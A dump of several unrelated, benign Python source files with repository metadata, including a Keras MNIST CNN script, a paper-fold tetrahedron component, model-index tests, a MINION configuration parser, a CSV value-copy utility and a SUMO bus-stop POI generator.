args.device_count = torch.cuda.device_count()
print("Using distributed mode for training.")
elif args.world_size == 1 and ranks_num == 1:
assert torch.cuda.is_available(), "No available GPUs."
# single GPU mode.
args.gpu_id = args.gpu_ranks[0]
assert args.gpu_id <= torch.cuda.device_count(), "Invalid specified GPU device."
args.dist_train = False
args.single_gpu = True
print("Using single GPU: {} for training.".format(args.gpu_id))
else:
# CPU mode.
assert ranks_num == 0, "GPUs are specified, please check the arguments."
args.dist_train = False
args.single_gpu = False
print("Using CPU mode for training.")
train_and_validate(args)
if __name__ == "__main__":
main()
| 55 | 143 | 0.687007 |
d18c08465c1f32bc5c25cd258c304646ee1f9efc
| 2,118 |
py
|
Python
|
resources/mechanics_lib/Tetrahedron.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 7 |
2016-01-20T02:33:00.000Z
|
2021-02-04T04:06:57.000Z
|
resources/mechanics_lib/Tetrahedron.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | null | null | null |
resources/mechanics_lib/Tetrahedron.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 3 |
2016-10-05T07:20:30.000Z
|
2017-11-20T10:36:50.000Z
|
from api.component import Component
from connector import Tab
from api.shapes import Face
from api.edge import *
class Tetrahedron(Component):
def defParameters(self):
self.newParameter("perimeter")
self.newParameter("start", 0)
self.newParameter("end", 1)
self.newParameter("min", 1)
def defInterfaces(self):
self.newInterface("endedge")
self.newInterface("startedge")
def assemble(self):
#an equilateral triangular face requires width = unitheight* rt(3)
fullwidth = self.getParameter("perimeter")/4.
fullheight = fullwidth*(3**.5)/2.
h = fullheight * abs(self.getParameter("end") - self.getParameter("start"))
def splits(width, frac):
return [width * x for x in (frac/2., 1-frac, 1+frac, 1-frac, 1+frac/2.)]
se = splits(fullwidth, self.getParameter("end"))
ss = splits(fullwidth, self.getParameter("start"))
m = min(self.getParameter("start"),
self.getParameter("end"),
self.getParameter("min")) * fullwidth / 2.
se[0] -= m
ss[0] -= m
se[-1] += m
ss[-1] += m
xb, xt, index = 0, 0, 0
for (xstart, xend) in zip(ss, se):
r = Face(((xb, 0), (xb+xstart, 0), (xt+xend, h), (xt, h)), origin=False)
if index:
self.drawing.attach("r%d.e2" % (index-1), r, "e0", "r%d" % index, Fold(109.5))
else:
self.drawing.append(r, "r%d" % index)
xb += xstart
xt += xend
index += 1
self.addConnectors((Tab(), "t1"), "r0.e0", "r4.e2", min(10, fullwidth / 2.), (Flat(), Cut()))
self.setInterface("startedge", ["r%d.e1" % x for x in range(5)])
self.setInterface("endedge", ["r%d.e3" % x for x in range(5)])
if __name__ == "__main__":
h = Tetrahedron()
h.setParameter("perimeter", 400)
h.setParameter("start", 1)
h.setParameter("end", 0)
h.make()
h.drawing.transform(relative = (0,0))
h.drawing.graph.toSTL("output/tetra.stl")
import utils.display
utils.display.displayTkinter(h.drawing)
| 32.584615 | 100 | 0.571766 |
c9c501e8a1f1ae12d26ca5df3e416c69e2ceb6a1
| 3,621 |
py
|
Python
|
chapter5/mnistcnn.py
|
yangzhijiang/GeektimeTensorflow
|
80479426a216d1d27fc78e53c581008ccec46cbe
|
[
"MIT"
] | 1 |
2020-02-16T13:31:42.000Z
|
2020-02-16T13:31:42.000Z
|
chapter5/mnistcnn.py
|
yangzhijiang/GeektimeTensorflow
|
80479426a216d1d27fc78e53c581008ccec46cbe
|
[
"MIT"
] | null | null | null |
chapter5/mnistcnn.py
|
yangzhijiang/GeektimeTensorflow
|
80479426a216d1d27fc78e53c581008ccec46cbe
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2019/2/16 19:24
# @Author : LunaFire
# @Email : [email protected]
# @File : mnistcnn.py
import os
import matplotlib.pyplot as plt
from keras import backend as K
from keras.datasets import mnist
from keras.utils import np_utils
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPool2D
from tensorflow import gfile
if __name__ == '__main__':
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
print(X_train.shape, Y_train.shape)
print(X_test.shape, Y_test.shape)
# 数据规范化
img_rows, img_cols = 28, 28
if K.image_data_format() == 'channels_first':
X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
print(X_train.shape, Y_train.shape)
print(X_test.shape, Y_test.shape)
# 数据归一化
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_train.shape[0], 'Train Samples')
print(X_test.shape[0], 'Test Samples')
# 对标签进行One-Hot编码
n_classes = 10
print('Shape Before One-Hot Encoding:', Y_train.shape)
Y_train = np_utils.to_categorical(Y_train, n_classes)
print('Shape After One-Hot Encoding:', Y_train.shape)
Y_test = np_utils.to_categorical(Y_test, n_classes)
# 定义网络结构
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu', input_shape=input_shape))
model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))
model.add(MaxPool2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(120, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(n_classes, activation='softmax'))
print(model.summary())
for layer in model.layers:
print(layer.get_output_at(0).get_shape().as_list())
# 编译模型
model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')
# 训练模型
history = model.fit(
X_train,
Y_train,
batch_size=32,
epochs=5,
verbose=2,
validation_data=(X_test, Y_test),
)
# 训练可视化
fig = plt.figure()
plt.subplot(2, 1, 1)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='lower right')
plt.subplot(2, 1, 2)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='lower right')
plt.tight_layout()
plt.show()
# 存储模型
save_dir = '../model/mnist/'
if gfile.Exists(save_dir):
gfile.DeleteRecursively(save_dir)
gfile.MakeDirs(save_dir)
model_name = 'keras_mnist.h5'
model_path = os.path.join(save_dir, model_name)
model.save(model_path)
print('Saved Trained Model At %s ' % model_path)
# 加载模型
model = load_model(model_path)
# 统计模型在测试集上的结果
loss_and_metrics = model.evaluate(X_test, Y_test, verbose=2)
print('Test Loss: {}'.format(loss_and_metrics[0]))
print('Test Accuracy: {}%'.format(loss_and_metrics[1] * 100))
| 30.686441 | 97 | 0.65921 |
4e625971225c80acdf439a7a8e8b15dc1f6e8b39
| 2,338 |
py
|
Python
|
tests/test_collections.py
|
datumbox/model-index
|
a39af5f8aaa2a90b8fc7180744a855282360067a
|
[
"MIT"
] | 12 |
2021-02-26T08:19:00.000Z
|
2022-01-26T14:00:16.000Z
|
tests/test_collections.py
|
datumbox/model-index
|
a39af5f8aaa2a90b8fc7180744a855282360067a
|
[
"MIT"
] | null | null | null |
tests/test_collections.py
|
datumbox/model-index
|
a39af5f8aaa2a90b8fc7180744a855282360067a
|
[
"MIT"
] | 3 |
2021-03-19T13:51:56.000Z
|
2021-08-25T05:25:52.000Z
|
import modelindex
import pytest
from modelindex import Metadata
from modelindex.models.Collection import Collection
from modelindex.models.CollectionList import CollectionList
from modelindex.models.Model import Model
from modelindex.models.ModelList import ModelList
from modelindex.models.Result import Result
from modelindex.models.ResultList import ResultList
from modelindex.models.ModelIndex import ModelIndex
import copy
def test_deepcopy():
mi = modelindex.load("tests/test-mi/03_col")
m1 = mi.models[0]
m2 = copy.deepcopy(m1)
m2.name = "New name"
assert m1.name != m2.name
assert m2.name == "New name"
m2.results[0].task = "New task"
assert m1.results[0].task != m2.results[0].task
assert m2.results[0].task == "New task"
m2.results.data.append(Result(task="", dataset="", metrics={}))
assert len(m1.results) == 1
assert len(m2.results) == 2
m2.metadata.flops = 10
assert m1.metadata.flops != m2.metadata.flops
assert m2.metadata.flops == 10
def test_col_merge():
mi = modelindex.load("tests/test-mi/17_collections_merge")
m1 = mi.models[0].full_model
m2 = mi.models[1].full_model
assert m1.metadata.training_data == "ImageNet"
assert m2.metadata.training_data == "Reddit"
assert len(m1.metadata.training_techniques) == 4
assert len(m2.metadata.training_techniques) == 5
assert m2.metadata.training_techniques[-1] == "Transformers"
assert m1.readme == "docs/inception-v3-readme.md"
assert m2.readme == "docs/inception-v3-readme-120.md"
mi = modelindex.load("tests/test-mi/17_collections_merge/mi2.yml")
m1 = mi.models[0].full_model
m2 = mi.models[1].full_model
assert len(m1.results) == 2
assert len(m2.results) == 2
assert m1.results[0].metrics["Top 1 Accuracy"] == "11%"
assert m2.results[0].metrics["Top 1 Accuracy"] == "11%"
assert m1.results[1].metrics["Top 1 Accuracy"] == "74.67%"
assert m2.results[1].metrics["Top 1 Accuracy"] == "75.1%"
mi = modelindex.load("tests/test-mi/17_collections_merge/mi3.yml")
err = mi.check(silent=True)
assert len(err) == 2
assert "Inception v3-1" in err[0]
m1 = mi.models[0].full_model
m2 = mi.models[1].full_model
assert m1.metadata.training_data is None
assert m2.metadata.training_data == "Reddit"
| 30.363636 | 70 | 0.696322 |
0118bbd621593dfd2ab53101f08164527bfdaec9
| 1,740 |
py
|
Python
|
src/onegov/election_day/forms/upload/wabsti_majorz.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/election_day/forms/upload/wabsti_majorz.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/election_day/forms/upload/wabsti_majorz.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.election_day.forms.upload.common import ALLOWED_MIME_TYPES
from onegov.election_day.forms.upload.common import MAX_FILE_SIZE
from onegov.form import Form
from onegov.form.fields import UploadField
from onegov.form.validators import FileSizeLimit
from onegov.form.validators import WhitelistedMimeType
from wtforms.validators import DataRequired
class UploadWabstiMajorzElectionForm(Form):
wm_gemeinden = UploadField(
label="WM_Gemeinden",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wm_kandidaten = UploadField(
label="WM_Kandidaten",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wm_kandidatengde = UploadField(
label="WM_KandidatenGde",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wm_wahl = UploadField(
label="WM_Wahl",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wmstatic_gemeinden = UploadField(
label="WMStatic_Gemeinden",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
| 28.52459 | 70 | 0.651724 |
61f6d2a5f05b2d6ba499dd31b52ea17416beb70c
| 12,746 |
py
|
Python
|
wz/minion.py
|
gradgrind/WZ
|
672d93a3c9d7806194d16d6d5b9175e4046bd068
|
[
"Apache-2.0"
] | null | null | null |
wz/minion.py
|
gradgrind/WZ
|
672d93a3c9d7806194d16d6d5b9175e4046bd068
|
[
"Apache-2.0"
] | null | null | null |
wz/minion.py
|
gradgrind/WZ
|
672d93a3c9d7806194d16d6d5b9175e4046bd068
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
minion.py - last updated 2021-05-27
Read MINION-formatted configuration data.
==============================
Copyright 2021 Michael Towers
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
MINION: MINImal Object Notation
-------------------------------
MINION is a simple configuration-file format taking ideas from JSON.
It contains structured data based on "dicts" (associative arrays), lists
and strings. Nothing else is supported. Files should be encoded as utf-8.
simple-string: A character sequence containing none of the following
control characters:
' ': A separator.
'#': Start a comment (until the end of the line).
':': Separates key from value in a dict.
'{': Start a dict.
'}': End a dict.
'[': Start a list.
']': End a list.
'<<<': Start a complex-string.
'>>>': End a complex-string.
dict: { key:value key:value ... }
A "key" is a simple-string.
A "value" may be a simple-string, a complex-string, a list or a dict.
list: [ value value ... ]
A "value" may be a simple-string, a complex-string, a list or a dict.
complex-string: <<< any characters ... >>>
A complex-string may be continued from one line to the next. In that
case the next line must (also) be prefixed by '<<<'. Empty and
comment lines will be ignored. Line breaks within a string are not
directly supported – but provision is made for specifying escape
characters: the basic escape sequences are '\\', '\n' and '\t'
(for backslash, newline and tab). Spaces at the end of a line are
ignored. In addition, for the sake of "completeness", there are
'\s' (space character), which makes a space character at end of a
line possible, and '\g' for '>', which makes '>' just before the
closing '>>>' possible.
Spaces are not needed around the control characters, but they may
be used. Apart from within complex-strings and their use as separators,
spaces will be ignored.
The top level of a MINION text is a "dict" – without the surrounding
braces ({ ... }).
There is also a very limited macro-like feature. Elements declared at the
top level which start with '&' may be referenced (which basically means
included) at any later point in a data structure by means of the macro
name, e.g.:
&MACRO1: [A list of words]
...
DEF1: { X: &MACRO1 }
There is a predefined macro for the empty string, '&', equivalent to the
following declaration (except that the key '&' doesn't appear in the
resulting mapping):
&: <<<>>>
"""
### Messages
_BAD_DICT_LINE = "Ungültige Zeile (Schlüssel: Wert):\n {line} – {text}"
_MULTI_KEY = "Schlüssel mehrfach definiert:\n {line} – {key}"
_BAD_DICT_VALUE = "Ungültiger Schlüssel-Wert:\n {line} – {val}"
_BAD_LIST_VALUE = "Ungültiger Listeneintrag:\n {line} – {val}"
_BAD_STRINGX = "Ungültige Text-Zeile:\n {line} – {text}"
_NO_KEY = "Schlüssel erwartet:\n {line} – {text}"
_EARLY_END = "Vorzeitiges Ende der Eingabe in Zeile {line}:\n {text}"
_NESTING_ERROR = "Datenstruktur nicht ordentlich abgeschlossen"
_NO_FILE = "MINION-Datei nicht gefunden:\n {path}"
_BAD_FILE = "Ungültiges Datei-Format:\n {path}"
_BAD_GZ_FILE = "Ungültiges Datei-Format (nicht 'gzip'):\n {path}"
_FILEPATH = "\n [in {path}]"
_BAD_MACRO = "Unbekanntes „Makro“: {line} – {val}"
### Special symbols, etc.
_COMMENT = '#'
_MACRO = '&'
_KEYSEP = ':'
_LIST0 = '['
_LIST1 = ']'
_DICT0 = '{'
_DICT1 = '}'
_DICTK = ':'
_STRING0 = '<<<'
_lenSTRING0 = len(_STRING0)
_STRING1 = '>>>'
_REGEX = r'(\s+|#|:|\[|\]|\{|\}|<<<|>>>)' # all special items
ESCAPE_DICT = {r'\n': '\n', r'\\': '\\', r'\t': '\t', r'\s': ' ', r'\g': '>'}
import re, gzip
_RXSUB ='|'.join([re.escape(e) for e in ESCAPE_DICT])
MACRO_BUILTINS = {
_MACRO: ''
}
class MinionError(Exception):
pass
###
class Minion:
"""An impure recursive-descent parser for a MINION string.
Usage:
minion = Minion()
python_dict = minion.parse(text)
"""
#
def report(self, message, **params):
msg = message.format(**params)
path = params.get('path')
if (not path) and self.filepath:
msg += _FILEPATH.format(path = self.filepath)
raise MinionError(msg)
#
def parse(self, text, filepath = None):
self.toplevel = None # Needed for macros
self.filepath = filepath
self.line_number = 0
self.lines = text.splitlines()
data, rest = self.DICT(None)
if rest or self.line_number < len(self.lines):
self.report(_EARLY_END, line = self.line_number,
text = self.lines[self.line_number - 1])
return data
#
def parse_file(self, fpath, **replacements):
try:
with open(fpath, 'r', encoding = 'utf-8') as fh:
text = fh.read()
except FileNotFoundError:
self.report(_NO_FILE, path = fpath)
except ValueError:
self.report(_BAD_FILE, path = fpath)
return self.parse_replace(text, fpath, **replacements)
#
def parse_replace(self, text, fpath, **params):
for rep, val in params.items():
text = text.replace(rep, val)
return self.parse(text, fpath)
#
def parse_file_gz(self, fpath, **replacements):
try:
with gzip.open(fpath, 'rt', encoding='UTF-8') as zipfile:
text = zipfile.read()
except FileNotFoundError:
self.report(_NO_FILE, path = fpath)
except OSError:
self.report(_BAD_GZ_FILE, path = fpath)
return self.parse_replace(text, fpath, **replacements)
#
def read_line(self):
if self.line_number >= len(self.lines):
if self.line_number == len(self.lines):
# No more lines
self.line_number += 1
return _DICT1
self.report(_NESTING_ERROR)
line = self.lines[self.line_number]
self.line_number += 1
return line.strip()
#
def read_symbol(self, line):
"""Read up to the next "break-item" (space or special character
or character sequence) on the current line.
Return a triple: (pre-break-item, break-item, remainder)
If there is no break-item or it is a comment, return
(pre-break-item, None, None).
"""
try:
line = line.replace('\t', ' ').strip()
sym, sep, rest = re.split(_REGEX, line, 1)
except:
return line, None, None
if sep == '#':
# Comment
return sym, None, None
if sep[0] == ' ':
if rest.startswith('#'):
# Comment
return sym, None, None
# If there is a space as break-item, use <None>.
sep = None
return sym, sep, rest
#
def DICT(self, line):
dmap = {}
if self.toplevel == None:
self.toplevel = dmap # Needed for macros
while True:
key, sep, rest = self.read_symbol(line)
if sep == _DICTK:
if not key:
self.report(_NO_KEY, line = self.line_number, text = line)
if key in dmap:
self.report(_MULTI_KEY, line = self.line_number, key = key)
elif sep == _DICT1 and not key:
# End of DICT
return dmap, rest
else:
if key or sep or rest:
self.report(_BAD_DICT_LINE, line = self.line_number,
text = line)
line = self.read_line()
continue
while not rest:
rest = self.read_line()
val, sep, rest2 = self.read_symbol(rest)
if val:
# A simple-string value ... or a macro
if val[0] == _MACRO:
try:
dmap[key] = self.toplevel[val]
except KeyError:
try:
dmap[key] = MACRO_BUILTINS[val]
except KeyError:
self.report(_BAD_MACRO, line = self.line_number,
val = val)
else:
dmap[key] = val
if sep == _DICT1:
return dmap, rest2
elif sep:
self.report(_BAD_DICT_LINE, line = self.line_number,
text = line)
elif sep == _STRING0:
# A complex-string value
dmap[key], rest2 = self.STRING(rest2)
elif sep == _DICT0:
# A sub-item (DICT or LIST)
dmap[key], rest2 = self.DICT(rest2)
elif sep == _LIST0:
dmap[key], rest2 = self.LIST(rest2)
else:
self.report(_BAD_DICT_VALUE, line = self.line_number,
val = rest)
line = rest2
#
def STRING(self, line):
lx = []
while True:
try:
line, rest = line.split(_STRING1, 1)
lx.append(line)
s0 = ''.join(lx)
s0 = re.sub(_RXSUB,
lambda m: ESCAPE_DICT[m.group(0)],
s0)
return s0, rest.lstrip()
except ValueError:
# no end, continue to next line
lx.append(line)
while True:
# Empty lines and comment-lines are ignored
line = self.read_line()
if (not line) or line.startswith(_COMMENT):
continue
try:
l1, l2 = line.split(_STRING0, 1)
if not l1:
line = l2
break
except ValueError:
pass
self.report(_BAD_STRINGX, line = self.line_number, text = line)
#
def LIST(self, line):
lx = []
while True:
while not line:
line = self.read_line()
sym, sep, rest = self.read_symbol(line)
if sym:
# A simple-string value ... or a macro
if sym[0] == _MACRO:
try:
lx.append(self.toplevel[sym])
except KeyError:
try:
lx.append(MACRO_BUILTINS[sym])
except KeyError:
self.report(_BAD_MACRO, line = self.line_number,
val = sym)
else:
lx.append(sym)
if not sep:
line = rest
continue
if sep == _LIST1:
# End of list
return lx, rest
elif sep == _STRING0:
# A complex-string value
sym, rest = self.STRING(rest)
elif sep == _DICT0:
# A DICT sub-item
sym, rest = self.DICT(rest)
elif sep == _LIST0:
# A LIST sub-item
sym, rest = self.LIST(rest)
else:
self.report(_BAD_LIST_VALUE, line = self.line_number,
val = rest)
lx.append(sym)
line = rest
#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#
if __name__ == '__main__':
minion = Minion()
data = minion.parse_file('_test/data/test1.minion',
_ABITUR_GRADES = "[15 14 13 12 11 10 09 08 07"
" 06 05 04 03 02 01 00 * n t nb /]")
for k, v in data.items():
if k[0] == _MACRO:
continue
print("\n *** SECTION %s ***" % k)
for k1, v1 in v.items():
print(" ... %s: %s" % (k1, v1))
print("TOPLEVEL:", minion.toplevel)
print("\n ++ Test gzipped file ++")
data = minion.parse_file_gz('_test/data/test2.minion.gz')
print("\n???", data)
quit(0)
for k, v in data.items():
print("\n *** SECTION %s ***" % k)
for k1, v1 in v.items():
print(" ... %s: %s" % (k1, v1))
| 35.904225 | 79 | 0.528323 |
fecb5c82863b05d04a7c6dd0172f1773db28b2f0
| 7,586 |
py
|
Python
|
python/csv_value_copy.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 89 |
2015-02-13T13:46:06.000Z
|
2022-03-13T16:42:44.000Z
|
python/csv_value_copy.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 91 |
2015-03-12T13:31:36.000Z
|
2022-01-14T07:37:37.000Z
|
python/csv_value_copy.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 138 |
2015-03-04T15:23:43.000Z
|
2022-03-09T15:11:52.000Z
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import argparse
import codecs
import csv
import sys
import openapc_toolkit as oat
ARG_HELP_STRINGS = {
"source_file": "The source csv file",
"source_file_key_column": "The numerical index of the key column " +
"in the source file",
"source_file_value_column": "The numerical index of the value column " +
"in the source file",
"target_file": "The csv file to enrich with values",
"target_file_key_column": "The numerical index of the key column " +
"in the target file",
"target_file_value_column": "The numerical index of the value column " +
"in the target file",
"strict": "keys with ambiguous values will be dropped from the " +
"mapping table (without this, the last encountered value will be used)",
"force_overwrite": "Replace existing values (otherwise only " +
"empty and NA fields will be replaced)",
"encoding": "The encoding of the CSV file. Setting this argument will " +
"disable automatic guessing of encoding.",
"other_encoding": "The optional encoding of the source CSV file.",
"quotemask": "A quotemask to apply to the result file after the action " +
"has been performed. A quotemask is a string consisting " +
"only of the letters 't' and 'f' (true/false) and has " +
"the same length as there are columns in the (resulting) " +
"csv file. Only the columns where the index is 't' will be " +
"quoted.",
"openapc_quote_rules": "Determines if the special openapc quote rules " +
"should be applied, meaning that the keywords " +
"NA, TRUE and FALSE will never be quoted. If in " +
"conflict with a quotemask, openapc_quote_rules " +
"will take precedence."
}
def main():
parser = argparse.ArgumentParser()
parser.add_argument("source_file", help=ARG_HELP_STRINGS["source_file"])
parser.add_argument("source_file_key_column", type=int, help=ARG_HELP_STRINGS["source_file_key_column"])
parser.add_argument("source_file_value_column", type=int, help=ARG_HELP_STRINGS["source_file_value_column"])
parser.add_argument("target_file", help=ARG_HELP_STRINGS["target_file"])
parser.add_argument("target_file_key_column", type=int, help=ARG_HELP_STRINGS["target_file_key_column"])
parser.add_argument("target_file_value_column", type=int, help=ARG_HELP_STRINGS["target_file_value_column"])
parser.add_argument("-s", "--strict", action="store_true", help=ARG_HELP_STRINGS["strict"])
parser.add_argument("-f", "--force_overwrite", action="store_true", help=ARG_HELP_STRINGS["force_overwrite"])
parser.add_argument("-e", "--encoding", help=ARG_HELP_STRINGS["encoding"])
parser.add_argument("-e2", "--other_encoding", help=ARG_HELP_STRINGS["other_encoding"])
parser.add_argument("-q", "--quotemask", help=ARG_HELP_STRINGS["quotemask"])
parser.add_argument("-o", "--openapc_quote_rules",
help=ARG_HELP_STRINGS["openapc_quote_rules"],
action="store_true", default=False)
args = parser.parse_args()
quote_rules = args.openapc_quote_rules
encs = [] #CSV file encodings
for encoding in [args.encoding, args.other_encoding]:
if encoding:
try:
codec = codecs.lookup(encoding)
msg = "Encoding '{}' found in Python's codec collection as '{}'"
print(msg.format(encoding, codec.name))
enc = args.encoding
except LookupError:
print ("Error: '" + encoding + "' not found Python's " +
"codec collection. Either look for a valid name here " +
"(https://docs.python.org/2/library/codecs.html#standard-" +
"encodings) or omit this argument to enable automated " +
"guessing.")
sys.exit()
encs.append(encoding)
mask = None
if args.quotemask:
reduced = args.quotemask.replace("f", "").replace("t", "")
if len(reduced) > 0:
print ("Error: A quotemask may only contain the letters 't' and" +
"'f'!")
sys.exit()
mask = [True if x == "t" else False for x in args.quotemask]
source_header, source_content = oat.get_csv_file_content(args.source_file, enc=encs[0])
key_column_name = "column " + str(args.source_file_key_column)
value_column_name = "column " + str(args.source_file_value_column)
if source_header:
header = source_header[0]
key_column_name = header[args.source_file_key_column]
value_column_name = header[args.source_file_value_column]
msg = u"Creating mapping table ({} -> {}) for source file {}...".format(key_column_name, value_column_name, args.source_file)
oat.print_g(msg)
mapping_table = {}
ambiguous_keys = []
for line in source_content:
if line:
key = line[args.source_file_key_column]
if key == 'NA':
continue
value = line[args.source_file_value_column]
if key not in mapping_table:
mapping_table[key] = value
else:
if mapping_table[key] != value:
if not args.strict:
msg = u"WARNING: Replacing existing value '{}' for key '{}' with new value '{}'".format(mapping_table[key], key, value)
mapping_table[key] = value
oat.print_y(msg)
else:
if key not in ambiguous_keys:
ambiguous_keys.append(key)
if args.strict:
for key in ambiguous_keys:
del(mapping_table[key])
msg = u"INFO: Ambiguous key '{}' dropped from mapping table".format(key)
oat.print_b(msg)
oat.print_g("mapping table created, contains " + str(len(mapping_table)) + " entries")
target_header, target_content = oat.get_csv_file_content(args.target_file, enc=encs[1])
line_num = 0 if not target_header else 1
replace_msg = u"Line {}: Found matching key '{}', replaced old value '{}' by '{}'"
modified_content = []
for line in target_content:
key = line[args.target_file_key_column]
if key in mapping_table:
new_value = mapping_table[key]
old_value = line[args.target_file_value_column]
if old_value != new_value:
if len(old_value) == 0 or old_value == "NA":
line[args.target_file_value_column] = new_value
msg = replace_msg.format(line_num, key, old_value, new_value)
oat.print_g(msg)
else:
if args.force_overwrite:
line[args.target_file_value_column] = new_value
msg = replace_msg.format(line_num, key, old_value, new_value)
oat.print_y(msg)
modified_content.append(line)
line_num += 1
with open('out.csv', 'w') as out:
writer = oat.OpenAPCUnicodeWriter(out, mask, quote_rules, True)
writer.write_rows(target_header + modified_content)
if __name__ == '__main__':
main()
| 47.710692 | 143 | 0.597284 |
e921f3f27b44858abfbec8e666ca9339e64d1af4
| 1,908 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/shapes/poi_at_stops.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/shapes/poi_at_stops.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/shapes/poi_at_stops.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
#!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2010-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file poi_at_stops.py
# @author Jakob Erdmann
# @date 2018-08-31
"""
Generates a PoI-file containing a PoI for each bus stop in the given net.
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import sumolib.net # noqa
from sumolib.xml import parse # noqa
if len(sys.argv) < 2:
print("Usage: " + sys.argv[0] + " <NET> <STOPS>", file=sys.stderr)
sys.exit()
print("Reading net...")
net = sumolib.net.readNet(sys.argv[1])
stops = sys.argv[2]
print("Writing output...")
with open('pois.add.xml', 'w') as f:
f.write('<?xml version="1.0"?>\n')
f.write('<additional>\n')
for stop in parse(stops, 'busStop'):
lane = net.getLane(stop.lane)
pos = (float(stop.startPos) + float(stop.endPos)) / 2
xypos = sumolib.geomhelper.positionAtShapeOffset(lane.getShape(), pos)
lon, lat = net.convertXY2LonLat(xypos[0], xypos[1])
f.write(' <poi id="%s" type="%s" color="1,0,0" layer="100" lon="%s" lat="%s"/>\n' % (
stop.id, stop.name, lon, lat))
f.write('</additional>\n')
| 36.692308 | 96 | 0.689203 |
3aef051281f5976411fee95c029eafcddc32c493
| 63,307 |
py
|
Python
|
evaluation.py
|
hoelzlmanuel/online-translator-evaluation
|
52c83db6a3601f2888110e6bf4f23e95d052313f
|
[
"MIT"
] | null | null | null |
evaluation.py
|
hoelzlmanuel/online-translator-evaluation
